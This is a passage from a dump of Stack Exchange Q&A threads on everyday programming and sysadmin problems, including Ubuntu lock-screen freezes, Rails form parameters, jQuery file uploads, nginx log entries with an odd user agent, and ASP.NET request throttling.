occasional freeze-ups. However, I have now discovered that I do not have to power-down-and-up to restart. If I have typed my log-in password completely, despite the frozen password-entry box, if I wait about 40 seconds, the screen goes black. After another lengthy wait, also probably less than a minute, the machine wakes up and displays my desktop! And nothing seems to have been lost in the process.\n\nI am now pretty sure where the trouble was. I was in the habit of locking the screen with the Super-L keystroke, and that may where the freeze-ups come from. When I (finally!) opened up the Ubuntu Settings, I discovered (under Privacy > Screen) that the Automatic Screen Lock was not on. Turning it on and adjusting the delay time to 3 minutes, I was able to check, now about four or five times, that entering my password re-opened the desktop to where I was, with no freeze-up problem.\nAs a bonus for doing the screen lock automatically, I find that the screen immediately goes black. With the Super-L key it usually (but not always) displays a bright screen with the password-entry-box and the time. And sometimes it stays that way all night.\nComment: did you check journalctl for logs for when the laptop locked and froze up? compare to when it unlocks properly\nAnswer: I have the same problem. It is a very serious problem in my opinion that Canonical must address now. In my case I have to restart the computer randomly because it freezes after some automatic screen locks, it doesn't happen every day but it does happen some days. In my opinion it happens more when I have a Snap application like Firefox open, so it is probably a problem with Snap and one of its applications. I have read in some forum that a user solved the problem by installing Firefox from deb packages after Snap. I am going to watch and monitor some of the snap processes. Other users relate it to AMD GPU drivers. 
I'm still paying attention to this thread.\nAnswer: I faced a similar problem - my lock screen would turn black after I pressed a button or moved the mouse to show the password field, and would remain black until I pressed a key or moved the mouse again. Firefox snap wasn't running, but was installed, so I removed it and the problem disappeared\nAnswer: I face the same issue, on 3 different computers (all upgraded from Ubuntu 20.04).\nI found at least a workaround: use Ctrl+Alt+F1 then Ctrl+Alt+F2. It should bring you again on the login screen. You type the password again, and you're back in your session.\nHowever, it's only a workaround.\nI've found https:\/\/bugs.launchpad.net\/ubuntu\/+source\/gnome-shell\/+bug\/1975884 that describes the same symptoms, but I do not always have his error message in my \/var\/log\/syslog\nAnswer: I locked my desktop via Super+L. Nothing in the above advice was helpful. All that blind-typing my password achieved was to bring up a blank desktop with no app icons or status bar, and nothing to do except reboot. Ctrl+Alt+F1 then Ctrl+Alt+F2 didn't seem to do anything useful. Ctrl+Alt+F2 has on occasion brought up a bare command prompt login that I do not have the expertise to do anything useful with.\nComment: As it's currently written, your answer is unclear. Please [edit] to add additional details that will help others understand how this addresses the question asked. You can find more information on how to write good answers [in the help center](\/help\/how-to-answer).\nComment: If you have a new question, please ask it by clicking the [Ask Question](https:\/\/askubuntu.com\/questions\/ask) button. Include a link to this question if it helps provide context. - [From Review](\/review\/late-answers\/1259759)\n","meta":{"source":"askubuntu","title":"Ubuntu 22.04.01: freeze-ups on refreshing from locked screen","dup_signals":{}},"subset":"stackexchange"} +{"text":"Matrix Solve for a particular form\n\nQuestion: Suppose that we have two matrices $\\mathbf A$ and $\\mathbf B$ which are known to us and both of them are square matrices of the same dimensions.\nNow we want to find a square matrix $\\mathbf C$ that solves following equation:\n$$\\mathbf C=\\mathbf A\\mathbf C\\mathbf A^\\top+\\mathbf B$$\nHow can we find this $\\mathbf C$ matrix in Mathematica?\nJust for additional information, it is for finding the state-space unconditional covariance matrix\nThanks\nAnswer: <code>LyapunovSolve[]<\/code> is designed for this:\n<code>amat = Array[a, {2, 2}]; bmat = Array[b, {2, 2}];\ncmat = LyapunovSolve[{amat, -IdentityMatrix[Length[amat]]},\n {IdentityMatrix[Length[amat]], Transpose[amat]}, -bmat];\n<\/code>\nCheck:\n<code>amat.cmat.Transpose[amat] + bmat - cmat \/\/ Simplify\n {{0, 0}, {0, 0}}\n<\/code>\n\nAlternatively, you can reformulate as a Kronecker product linear system:\n<code>cmat2 = Partition[LinearSolve[KroneckerProduct[amat, amat] - \n IdentityMatrix[Length[amat]^2],\n -Flatten[bmat]], Length[amat]];\n<\/code>\nCheck:\n<code>amat.cmat2.Transpose[amat] + bmat - cmat2 \/\/ Simplify\n {{0, 0}, {0, 0}}\n<\/code>\nComment: Thanks for your help. I checked Mathematica documentation and you are right. 
I should use `LyapunovSolve[]`, but since it is a discrete version, I should use `DiscreteLyapunovSolve[]`.\n","meta":{"source":"mathematica.stackexchange","title":"Matrix Solve for a particular form","dup_signals":{}},"subset":"stackexchange"} +{"text":"Facebook stating my app short dynamic link as against community standards\n\nQuestion: I have a mobile app that people can share a link to it on Facebook and it's has been fine for months. But in the last few days, when people share the short dynamic (deep) link that is configured in Firebase dynamic links, Facebook says it goes against community standards. \nHowever, if I post the long deep link (not the short) on Facebook, it works fine. I used the Facebook share debugger to see what could be the problem. If I put the short deep link, it says \"the website contains a blocked URL\" and nothing more (no other info or meta data). Even though, the links that the deep link converts to are the app on play and app store, and for the web it's the web page that shows a description of the app and has been the same all the time while the share was working fine (the web page url only shows a warning to include some missing properties in page and not a blocked URL on Facebook share debugger, same message as with working long dynamic link). \nSo how can I figure out the real problem? Many thanks.\nAnswer: Found the problem. It was the image preview URL in the dynamic link. For some reason, the hosted link was considered as a suspicious URL even though in was hosted on a trusted site and works on other platforms.\nAnswer: have you used deferred deep link in facebook ads ?\nComment: This does not answer the question\n","meta":{"source":"stackoverflow","title":"Facebook stating my app short dynamic link as against community standards","dup_signals":{}},"subset":"stackexchange"} +{"text":"1 parameter not saving on create\n\nQuestion: I have a 'parent_id' which is successfully passed as parameter into a form page (\"Create Child\") here :\n<code><li><%= link_to \"Create Child\", new_block_path(:parent_id => @block.id)%><\/li>\n<\/code>\nLogging the parameter gives :\n<code>Started GET \"\/blocks\/new?parent_id=7\" for ::1 at 2022-10-31 22:01:05 +0000\nProcessing by BlocksController#new as HTML\n Parameters: {\"parent_id\"=>\"7\"}\n<\/code>\nI then have a form which calls a <code>create<\/code> method here :\n<code>def create\n @block = Block.new(block_params)\n\n if @block.save\n redirect_to @block\n else\n render :new, status: :unprocessable_entity\n end\n end\n<\/code>\nusing these block_params\n<code>private \n def block_params\n params.require(:block).permit(:title, :body, :parent_id)\n end\n end\n<\/code>\nBut when I call the create function only :title and :body are present.\nPrinting the parameters shows :\n<code>Started POST \"\/blocks\" for ::1 at 2022-10-31 22:01:17 +0000\nProcessing by BlocksController#create as TURBO_STREAM\nParameters: {\"authenticity_token\"=>\"[FILTERED]\", \n\"block\"=>{\"title\"=>\"this is a child of block 7\", \n\"body\"=>\"this is a child of block 7\"}, \"commit\"=>\"Create Block\"}\n<\/code>\nFiltered shows <code>:title<\/code> and <code>:body<\/code> are permitted correctly, but the URL parameter of <code>parent_id<\/code> has just vanished.\nThe rails guide states : \"Submitted form data is put into the params Hash, alongside captured route parameters\" - I just can't work this out. 
The parent_id parameter is there as it should be when the form is loaded, but when submitted it vanishes.\nAnswer: There are two actions, <code>new<\/code> and <code>create<\/code>, you could think they are separate.\nSo params from <code>new<\/code> won't be available in <code>create<\/code> automatically (in your case <code>parent_id<\/code>), you have to pass the params explicitly.\nYou could just add a hidden input in your form to pass <code>parent_id<\/code>:\n<code><%= form_with model: @block do |f| %>\n <%= f.hidden_field :paren_id, value: params[:parent_id] %>\n <%= f.text_field :title %>\n <%= f.text_field :body %>\n<% end %>\n\n<\/code>\n","meta":{"source":"stackoverflow","title":"1 parameter not saving on create","dup_signals":{}},"subset":"stackexchange"} +{"text":"Selenium with Java - Unable to create a loop for a drop down\n\nQuestion: I could not manage to select the next drop down item through the locator of the selected item. My intention is to test a site for different languages through the drop down. Sending keyboard down arrow activates the scroll bar in the drop down. Could anyone please help on this ? \n<code>driver.findElement(By.xpath(\".\/\/*[@id='trigger']\/div\/paper-input\/paper-input-container\")).click();\n Thread.sleep(1000);\n driver.findElement(By.xpath(\".\/\/*[@id='langList']\/\/paper-item\/\/.[@tabindex=\\\"0\\\"]\")).click();\n Thread.sleep(1000);\n driver.findElement(By.xpath(\".\/\/*[@id='langList']\/\/paper-item\/\/.[@tabindex=\\\"0\\\"]\")).sendKeys(Keys.ENTER, Keys.ARROW_DOWN);\n<\/code>\nAnswer: I was going to write out some examples, but remembered Dave Haeffner had already covered this in his elemental selenium series. \nYou can find the great write-up of that here:\nHow To Select from a Dropdown in Selenium\nI will mention one thing though. You should make a great effort at never using implicit waits (Thread.sleep()). They do not make for clear exception errors unless they are handled well, and will slow down your tests greatly. Identify what you are waiting on, and create an explicit wait. If you need more information on creating those, I can go into more detail.\nAnswer: Thanks a lot. It works now with the following code:\n<code>driver.findElement(By.xpath(\".\/\/*[@id='trigger']\/div\/paper-input\/paper-input-container\")).click();\n Thread.sleep(1000);\n driver.findElement(By.cssSelector(\".style-scope.making-language-selector.iron-selected.x-scope.paper-item-0\")).click();\n\n driver.findElement(By.cssSelector(\".style-scope.making-language-selector.iron-selected.x-scope.paper-item-0\")).sendKeys(Keys.ARROW_DOWN, Keys.ENTER);\n<\/code>\nComment: StackOverflow really needs to change the rep needed to add comments lower than 50.\n","meta":{"source":"stackoverflow","title":"Selenium with Java - Unable to create a loop for a drop down","dup_signals":{}},"subset":"stackexchange"} +{"text":"Applying Aspect Oriented Programming\n\nQuestion: I've been using some basic AOP style solutions for cross-cutting concerns like security, logging, validation, etc. My solution has revolved around Castle Windsor and DynamicProxy because I can apply everything using a Boo based DSL and keep my code clean of Attributes. I was told at the weekend to have a look at PostSharp as it's supposed to be a \"better\" solution. 
I've had a quick look at PostSharp, but I've been put off by the Attribute usage.\nHas anyone tried both solutions and would care to share their experiences?\nAnswer: Couple of minor issues with PostSharp...\nOne issue I've had with PostSharp is that whilst using asp.net, line numbers for exception messages are 'out' by the number of IL instructions injected into asssemblies by PostSharp as the PDBs aren't injected as well :-).\nAlso, without the PostSharp assemblies available at runtime, runtime errors occur. Using Windsor, the cross-cuts can be turned off at a later date without a recompile of code.\n(hope this makes sense)\nComment: This is a pretty old answer that I stumbled across, but I just wanted to note that PostSharp does now actually transform the PDB files, so the debugging issue is no more (see: http:\/\/stackoverflow.com\/questions\/2006508\/postsharp-pdb-debugging-and-referenced-assemblies)\nAnswer: I only looked at castle-windsor for a short time (yet) so I can't comment on that but I did use postsharp.\nPostsharp works by weaving at compile time. It ads a post-compile step to your build where it modifies your code. The code is compiled as if you just programmed the cross cutting concerns into you code. This is a bit more performant than runtime weaving and because of the use of attributes Postsharp is very easy to use. I think using attributes for AOP isn't as problematic as using it for DI. But that's just my personal taste.\nBut...\nIf you already use castle for dependency injection I don't see a good reason why you shouldn't also use it for AOP stuff. I think though the AOP at runtime is a bit slower than at compile time it's also more powerful. AOP and DI are in my opinion related concepts so I think it's a good idea to use one framework for both. So I'll probably look at the castle stuff again next project I need AOP.\n","meta":{"source":"stackoverflow","title":"Applying Aspect Oriented Programming","dup_signals":{}},"subset":"stackexchange"} +{"text":"\"WICKED\" entries in the default nginx vhost's logs\n\nQuestion: I have a small VPS running nginx, and for a long time now (several months, since I rented it) it has been collecting weird entries in its default (listen 80 default;) vhost's logs: \n<code>109.x.x.121 - - [07\/Dec\/2012:07:42:43 +0100] \"GET \/webpanel\/gate.php HTTP\/1.1\" 404 168 \"-\" \"WICKED\"\n<\/code>\nthere is a lot of those, from a few different IPs\n<code># grep WICKED \/var\/log\/nginx\/x.access.log | awk '{print $1}' | sort | uniq | wc -l\n18\n<\/code>\nThere are also recurring ones, like this one which polls the server every minute \n<code>95.x.x.4 - - [07\/Dec\/2012:08:17:35 +0100] \"-\" 400 0 \"-\" \"-\"\n95.x.x.4 - - [07\/Dec\/2012:08:18:37 +0100] \"-\" 400 0 \"-\" \"-\"\n95.x.x.4 - - [07\/Dec\/2012:08:19:39 +0100] \"-\" 400 0 \"-\" \"-\"\n<\/code>\nuntil it stops. According to its PTR and whois information, this particular IP belongs to a dynip range of some German cable company so it's probably not a monitoring service. \nNow, here's my question, what am I looking at?\nWas the IP being used in some sort of bot herding before I got it? Or maybe my server was compromised? Those entries were showing up when I only had sshd and nginx serving static sites so pretty much nothing to exploit. \nEDIT: yeah, I inflated the numbers unwittingly because I forgot to sort, fixed. \nComment: We must perform an exorcism to cleanse these WICKED NUMBERS!\nAnswer: The last two fields by default are the referrer and user agent fields (nginx reference). 
Normally you'd see something there like a browser (Mozilla), search bot (Googlebot), command line program (\"Wget\", \"curl\") etc. there. Whoever is running something against your server is using \"WICKED\" as a user agent string.\nComment: And I'd also point out that this means nothing specific. Just someone decided to call their program \"WICKED\"; that's really all you can conclude directly.\nComment: Yup, could be custom-made, could be a regular browser with a custom user agent. No telling.\n","meta":{"source":"security.stackexchange","title":"\"WICKED\" entries in the default nginx vhost's logs","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to correctly send a form data with text and file input fields?\n\nQuestion: I am having a problem with sending a form with both text and file fields. I can choose from : \n1) sending customized request with specified fields\n<code>$(\"#form_new_product\").submit(function(event){\nevent.preventDefault();\n if ( product_name ) { \n $.post( \n '\/product\/create',\n { product_name: product_name,\n product_description: product_description\n \/\/ file : file ???\n }) \n .fail(function(res){\n alert(\"Error: \" + res.getResponseHeader(\"error\"));\n }) \n .done(function(res){\n showInfoAlert(\"Product : \\\"\" + product_name + \"\\\" has been added to catalog.\");\n }); \n }\n}\n<\/code>\nbut this way I cannot specify the file (file.path) to be uploaded - that's what being passed with <code>files<\/code> field of POST request (any idea how to do it ?)\n2) post the 'normal'\/not customized form fields but I am not sure how to do it with ajax in jquery (to use methods from above snippet <code>showInfoAlert<\/code> and <code>showErrorAlert<\/code> to indicate response status)\nComment: do you want to support IE8 and IE9?\nAnswer: An excellent way to handle this, since you're using jQuery anyway, is the jQuery Form plugin: http:\/\/malsup.com\/jquery\/form\/. It's widely used, free of any major bugs as far as I've ever seen (been using it for many months), easy to implement.\nComment: It looks nice but I cannot understand how can I join text and file fields to put in one POST request.\nComment: @Patryk just add more `` next to the file input, or before, in the same form, with this plugin you can just `$('#form_new_product').ajaxSubmit({success: ..., error: ...})` and it will submit ALL the fields, the text and file types as well. see my answer below for an example\nComment: It didn't answer the question\nAnswer: First off, make sure you name your form inputs correctly, that will make your life easier\n \n \n \n \n \nIf you do not wish to support IE8\/9 for your ajax upload you can use the following:\n<code>\/\/ FormData is not supported by ie8 and 9 as far as I know\n\/\/ and some others see here: http:\/\/caniuse.com\/#search=FormData \n\/\/ you can check for FormData support by something like this\nvar supportFormData = function(){\n return !! 
window.FormData;\n};\n\n $('#form_new_product').submit(function(e) {\n e.preventDefault();\n var form;\n\n \/\/ you can pass in your form element here if you have the <input> tags named correctly, like this:\n form = new FormData($(\"#form_new_product\").eq(0)) \/\/ that's the easiest way\n\n \/\/ or you can create a FormData object and append stuff to it\n form = new FormData();\n \/\/ signature --> form.append(input[name], input[value])\n form.append('product_name', $('#form_new_product input[name=\"product_name\"]').val());\n form.append('product_description', $('#form_new_productinput[name=\"product_description\"]').val());\n \/\/ now a file input,\n form.append('product_image', $('#form_new_product input[type=\"file\"]').eq(0).files[0], 'image.png'\/*optional*\/);\n\n return $.ajax({\n url: '\/path\/to\/form\/action',\n type: 'POST',\n data: form,\n mimeType:'multipart\/form-data\",\n contentType: false,\n cache: false,\n processData: false\n )\n .done(function(response){\n \/\/ handle success\n })\n .fail(function(response){\n \/\/ handle error\n });\n});\n<\/code>\nIf you want to support IE8 and IE9, you may need to do some little tweaking server side as well,\nand your submitForm function won't be as simple as the previous one, I would suggest using http:\/\/malsup.com\/jquery\/form\/\nlike some of the other answers did, but as the plugin mentions, here\nthe server response header MUST be <code>text\/html<\/code> so IE8 won't trigger a file download for a JSON response (assuming you are expecting a JSON response) - basically this plugin is creating an iFrame with a form in it and submits it to the server for you. There is other solution than the <code>text\/html<\/code> like wrapping the response with a <code><textarea><\/code>, check that last link I mentioned.\nSo, assuming you are using this plugin, here's I would do it.\n<code>var isIE = function () {\n var myNav = navigator.userAgent.toLowerCase();\n return (myNav.indexOf('msie') != -1) ? parseInt(myNav.split('msie')[1]) : false;\n}\n\n$('#form_new_product').submit(function(e) {\n e.preventDefault();\n var $form = $(\"#form_new_product\");\n\n var options = {\n url: '\/path\/to\/form\/action',\n type: \"POST\",\n mimeType: \"multipart\/form-data\"\n };\n\n \/\/ hack because IE lt 9 iFrame triggers a file download for a application\/json response\n \/\/ http:\/\/stackoverflow.com\/questions\/17701992\/ie-iframe-doesnt-handle-application-json-response-properly\n if (Reporting.util.isIE() <= 9) {\n \/\/ maybe you have another contract with the server, like a custom query string or whatever\n \/\/ but the server needs to return text\/html\n options.ContentType = \"text\/html\";\n }\n\n \/\/ don't think this returns a promise, so you can use the options.success and options.error like that\n options.success = function(response){\n \/\/ handle success\n };\n options.error = function(response){\n \/\/ handle error\n };\n\n \/\/ or you really want to return a promise, then you can \n var deferred = new $.Deferred();\n options.success(function(response){\n deferred.resolve(response);\n });\n options.error(function(response){\n deferred.reject(response);\n })\n\n \/\/ this will submit all of your inputs\n form.ajaxSubmit(options);\n return deferred;\n}); \n<\/code>\nAnswer: You can't send file field without user's confirmation.\nUser has to fill the field by hand.\nIf it's ok for you, you can read this page which will explain how to do it ;-)\nComment: User is going to fill the field by hand. 
I have a file input widget from http:\/\/jasny.github.io\/bootstrap\/javascript\/#fileinput.\n","meta":{"source":"stackoverflow","title":"How to correctly send a form data with text and file input fields?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Installing vendor library using composer\n\nQuestion: I'm trying to use the https:\/\/github.com\/webonyx\/graphql-php\/ library to make graphql requests.\nBut for some reason it doesn't work, and I can't figure out why.\nI'm using this command to install:\n<code>composer require webonyx\/graphql-php\n<\/code>\nVendor folder with content + <code>composer.json<\/code> \/ <code>composer.lock<\/code> appear in the project folder.\nWhen I try a simple code like:\n<code><?php\n\nrequire_once 'vendor\/autoload.php';\n\nuse GraphQL\\Client;\nuse GraphQL\\Query;\n\n\/\/ Replace with your actual GraphQL endpoint and API key\n$graphqlEndpoint = 'https:\/\/platformurl';\n\n\/\/ Set up the GraphQL client\n$client = new Client($graphqlEndpoint);\n\n?>\n<\/code>\n\nFatal error: Uncaught Error: Class \"GraphQL\\Client\" not found in\n\/url\/test.php:14 Stack trace: #0 {main} thrown in \/url\/test.php on\nline 14\n\nWhen I check composer.json it contains this:\n<code>{\n \"require\": {\n \"webonyx\/graphql-php\": \"^15.7\"\n }\n}\n<\/code>\nI tried <code>composer install<\/code> or <code>update<\/code>.\nI tried a <code>require<\/code> with the direct link to graphql folder.\nBut there is no difference.\nI found that there was no src\/client.php file in the graphql-php library folder, but I don't know if this is necessary or how that comes (chatGPT said this is the reason why it doesn't works)..\nPHP Version is PHP 8+. What could be the reason?\nComment: \"it doesn't work\" - what does that mean? If installing the package works, are oyu sure this problem is related to Composer after all?\nAnswer: If your useing autoload after adding new class you should run composer dump-autoload to cached list of classes\nAnswer: As you have seen, there is no <code>GraphQL\\Client<\/code> (or <code>Query<\/code>) classes. Wherever you got the \"simple code\" from is not how the package is used. I suggest looking in the examples directory and other documentation in the repository to see how it can actually be used.\nAnswer: I understand you have the php file in the <code>src<\/code> folder. Change the path to the <code>vendor<\/code> folder\n<code>- vendor\n- src\n-- client.php\n<\/code>\n<code>require __DIR__ . '\/..\/vendor\/autoload.php';\n<\/code>\n","meta":{"source":"stackoverflow","title":"Installing vendor library using composer","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I stop a slick-slider from auto rotate?\n\nQuestion: I wanna stop a slick-slider from auto rotating. 
I do not have the code but need to overwrite it.\n<code><slick-slider>\n <slick-list>\n <slick-track>\n\n <slick-slide>\n <\/slick-slide>\n <slick-slide>\n <\/slick-slide>\n\n <slick-track>\n <slick-list>\n<slick-slider>\n<\/code>\nAnswer: Make the autoplay: false\nHTML \n<code><div class=\"slider autoplay\">\n <div><h3>1<\/h3><\/div>\n <div><h3>2<\/h3><\/div>\n <div><h3>3<\/h3><\/div>\n<\/div>\n<\/code>\nJquery \n<code>$('.autoplay').on('init', function(slick) {\n$('.slick-dots').on('click',function() {\n $('.autoplay').slick('slickPause');\n});\n}).slick({\n slidesToShow: 3,\n slidesToScroll: 1,\n dots: true,\n autoplay: false,\n autoplaySpeed: 2000,\n})\n<\/code>\nmake sure you have linked the slick and jquery.\n","meta":{"source":"stackoverflow","title":"How can I stop a slick-slider from auto rotate?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Blocking dangerous IPs for accessing a resource\n\nQuestion: \nEnvironment\nMy IIS host an WebApp with WebService resources.\n\n...\nmyWebService.asmx\nmyWebService.svc\n...\n\nProblem\nSame bad guys, try to block server accessing the public resources with theirs bots.\nApplied solution\n\nI Build a filter:\n\n<code>public class BadGuysFilter\n{\n private class BadGuy\n {\n public BadGuy()\n {\n Visits = 0;\n FirstSuspiciousVisit = DateTime.Now;\n }\n\n public int Visits;\n public DateTime FirstSuspiciousVisit;\n }\n\n private static volatile Dictionary<string, BadGuy> _blackList = new Dictionary<string, BadGuy>();\n private static int _visitsLimit = 10;\n private static int _minutsLimit = 10;\n private static int _removeFromBlackListMinutesLimit = 30;\n\n public static void Init(int visitsLimit = 10, int minutsLimit = 10, int removeFromBlackListMinutesLimit = 30)\n {\n _visitsLimit = visitsLimit;\n _minutsLimit = minutsLimit;\n _removeFromBlackListMinutesLimit = removeFromBlackListMinutesLimit;\n }\n\n public static bool IsBadGuy()\n {\n return IsBadGuy(HttpContext.Current.Request.UserHostAddress);\n }\n public static bool IsBadGuy(string ip)\n {\n if (HttpContext.Current.Request.IsAuthenticated \/*|| HttpContext.Current.Request.HttpMethod.ToUpper() == \"POST\"*\/)\n return false;\n\n if (_blackList.Keys.Any(k => k == ip))\n {\n _blackList[ip].Visits++;\n\n if (_blackList[ip].FirstSuspiciousVisit < DateTime.Now.AddMinutes(-_removeFromBlackListMinutesLimit))\n _blackList.Remove(ip);\n else if (_blackList[ip].FirstSuspiciousVisit < DateTime.Now.AddMinutes(-_minutsLimit))\n {\n _blackList[ip].Visits = 0;\n _blackList[ip].FirstSuspiciousVisit = DateTime.Now;\n }\n else if (_blackList[ip].Visits > _visitsLimit)\n {\n _blackList[ip].FirstSuspiciousVisit = DateTime.Now;\n return true;\n }\n }\n else\n _blackList.Add(ip, new BadGuy());\n\n return false;\n }\n public static void Punish()\n {\n var res = HttpContext.Current.Response;\n res.Clear();\n res.StatusCode = 429;\n res.StatusDescription = \"TOO MANY REQUESTS: Your application is sending too many simultaneous requests.\";\n res.End();\n }\n}\n<\/code>\nUse filter in Global.asax\n\n<code>void Application_BeginRequest(object sender, EventArgs e) {\n if(BadGuysFilter.IsBadGuy())\n BadGuysFilter.Punish();\n\n \/\/ do stuff \/\/\n}\n\nvoid Application_EndRequest(object sender, EventArgs e) {\n var app = (HttpApplication)sender;\n\n if (app.Context.Response.StatusCode == 429) \/\/ \"TOO MANY REQUESTS\"\n return;\n\n \/\/ do stuff \/\/\n}\n<\/code>\n\nQuestion\nIs this an enough safe solution? Or maybe there is another way?\nEdite:\n\"don't block at the resource itself. 
block farther upstream, e.g. at the firewall. \u2013 Marc B\"\nYes, you're right. This is final solution, but before apply it i need intermediate solution to defend my server. I forgot to mention this thing. \u2013 Artiom\nComment: don't block at the resource itself. block farther upstream, e.g. at the firewall.\nComment: as @MarcB says, this solution is going to tie up IIS resources for every blocked request, which is not going to help if they're doing DDOS attack.\nComment: Yes, you're right. This is final solution, but before apply it i need intermediate solution to defend my server. I forgot to mention this thing.\nAnswer: You can use IIS Dynamic IP restriction module (from Microsoft):\nhttp:\/\/www.iis.net\/downloads\/microsoft\/dynamic-ip-restrictions\nAnswer: I agree with the comments above. You need to block ddos further upstream otherwise you application is still going to be servicing each request. \nThis type of approach appears to lack any persistence. Therefore, when they bombard your system and you recycle the app pools, it will reset. On the other hand, the firewall apprach lacks the flexibility to remove after a certain time...I think.\nThat said, if you need to handle suspicious requests of a different nature such as too many request to the login page but not the home page or something then this could be a viable solution.\nIt is really just considering all of your goals and understanding the risks and limitations.\n","meta":{"source":"stackoverflow","title":"Blocking dangerous IPs for accessing a resource","dup_signals":{}},"subset":"stackexchange"} +{"text":"Stored Procedure Performance Tuning\n\nQuestion: I got project where I need to do improve performance of the application. To improve performance I have did following changes in the application & sql Stored procedure:\n\nI have replaced all temp tables to sub-queries in the stored procedure \nCalling SP once instead of calling multiple times do to insert multiple parameters to table one by one. (Note: created XML file with all parameters data and sent to new Stored procedure where I am doing insert parameters data to table using cursor)\n\nAm I doing\/following right way?\nAnswer: Something you should take note of; If you are linking any tables in your select, be sure to use JOINS instead of selects inside selects, this may seem like a minor thing to do, but this type of change could cut your procedure's run time in half.\nAnswer: Replacing temp. 
tables with subqueries can actually make the performance worse, because that can cause the same statement to be executed hundreds of times, instead of filling the temp table once.\nAlso blindly just removing procedure calls and replacing it with XML handling and cursor can be a big step backwards.\nInstead of asking us if this is the correct thing, you should really measure it.\nAnd in addition to that, you should look into the normal places for performance tuning:\n\nIndexing: Look at statistics io output for selected queries or plan cache for overall I\/O usage\nBlocking: If something is blocking your statements, you should definitely see if there's something that can be done\nExpensive operations in query plans: Sorts, Spools, key lookups with large number of executions.\nAnswer: Performnce tuning Link\nShow Execution Plan\nhttps:\/\/statisticsparser.com\/\nSET Statistics IO,TIME ON in query and copy paste the messages from output window to https:\/\/statisticsparser.com\/ in readable format.\n\nCreate Non- Clustered Index for all Columns that are used in Where\nClause\nAdd SET NOCOUNT ON\nAdd With No Lock on all tables used in Query\nAdd Non Clustered With Include for all columns in where clause\nDo not include functions in Join or in Where Clause\nCTE instead of SubQuery\nSelect only required columns\n","meta":{"source":"stackoverflow","title":"Stored Procedure Performance Tuning","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I update to Ubuntu 12.04 if update manager doesn't prompt it?\n\nQuestion: I was updating to Ubuntu 12.04 and I lost my wireless connection. I turned off my computer and got to a better connection and now my \"Update Manager\" does not prompt for the upgrade.\nComment: You were in the middle of the upgrade process?\nComment: Yes, it had already started downloading for at least an hour...\nComment: What is the output of `lsb_release -a`?\nAnswer: Make sure that all possible updates are installed using update-manager.\nAfter that you can trigger the update-manager with the dist-upgrade option which should start it showing the upgrade option to 12.04.\nDo it like this:\n\nPress Alt+F2\nType \"update-manager --dist-upgrade\" and press enter\n\nIf that doesn't work it might be that all your repositories are already changed to the new distribution. You just need to finalize the installation:\n\nPress Alt+F2\nType \"gnome-terminal\" and press enter\nIn the terminal window type \"sudo apt-get update; sudo apt-get upgrade\"\nEnter your password when prompted\nAccept the proposed update\n\nPlease let us know if one of these ways worked for you.\nComment: When I tried it the first way, it says \"Your system is up to date\"\n\nWhen I tried it the second way it just said 0 upgraded.\n\nWhat happened was it was partially installed and when my internet connection got lost, it said it would save what had been upgraded so far.\nAnswer: Try <code>sudo apt-get dist-upgrade<\/code>; if your system is fully updated before you type that, it SHOULD upgrade to the newer version.\nUh, good luck; this usually works, but not every time.\nComment: no, `sudo apt-get dist-upgrade` does not upgrade Ubuntu to a higher version. 
See http:\/\/manpages.ubuntu.com\/manpages\/precise\/en\/man8\/apt-get.8.html\n","meta":{"source":"askubuntu","title":"How do I update to Ubuntu 12.04 if update manager doesn't prompt it?","dup_signals":{}},"subset":"stackexchange"} +{"text":"calling a page with ajax based on url parameter\n\nQuestion: please can anyone help me with this problem that i've encountered. i'm able to capture a url parameter with javascript and i want to add it to my jquery code which calls a page in a div but i'm able to do it. here's my code:\n<code><script type=\"text\/javascript\" src=\"http:\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/1.7\/jquery.min.js\"><\/script>\n<script language=\"javascript\" type=\"text\/javascript\">\n function urlink()\n {\n var tlink = window.location.search.substring(1);\n }\n\n jQuery(function($){\n $('#mydiv').load('real_news.asp?'+ urllink());\n });\n<\/script>\n<\/code>\nComment: Your function does not _return_ anything, so trying to concatenate its return value (most likely just _undefined_) with something else is rather pointless.\nAnswer: <code><script type=\"text\/javascript\" src=\"http:\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/1.7\/jquery.min.js\"><\/script>\n<script language=\"javascript\" type=\"text\/javascript\">\n function urlink()\n {\n return window.location.search.substring(1);\n }\n\n jQuery(function($){\n $('#mydiv').load('real_news.asp?'+ urllink());\n });\n<\/script>\n<\/code>\nComment: now i'm able to pass the parameter. but the problem is the page doesn't load the page unless i refresh, any idea about how to make it work.\n","meta":{"source":"stackoverflow","title":"calling a page with ajax based on url parameter","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to get pylint and black working together in VSCode?\n\nQuestion: I've been trying to get pylint and black working together on VSCode without success.\nI can get either one working but only if the other isn't (i.e. black will format but nothing will be reported by pylint, or pylint will report errors but running 'Format Code' does nothing).\nHere's my setttings.json:\n<code>{\n \"editor.formatOnSave\": true,\n \"editor.formatOnPaste\": false,\n \"editor.formatOnType\": false,\n \"python.pythonPath\": \"\/usr\/bin\/python3\",\n \"python.linting.pylintEnabled\": true,\n \"python.linting.pylintPath\": \"\/usr\/bin\/pylint-3\",\n \"python.linting.flake8Enabled\": false,\n \"python.linting.flake8Path\": \"\/usr\/bin\/flake8-3\",\n \"python.formatting.provider\": \"black\",\n \"python.formatting.blackPath\": \"\/usr\/bin\/black\",\n \"python.formatting.blackArgs\": [\n \"--line-length=110\"\n ],\n \"python.unitTest.pyTestEnabled\": true,\n \"workbench.colorTheme\": \"Default Light+\",\n \"workbench.settings.editor\": \"json\",\n \"python.linting.enabled\": true\n}\n<\/code>\nEnvironment:\n\nFedora 29\nVSCode 1.28.2\nPython extension 2018.9.2\npylint 2.1.1\nblack 18.6b4\nComment: any success getting this to work?\nAnswer: I've tried this before no success. Neither did <code>flake8<\/code> + <code>autopep8<\/code> if my memory serves me right. And now I won't even be able to install the two of them in the same <code>pipenv<\/code> virtual environment due to some dependency conflicts. 
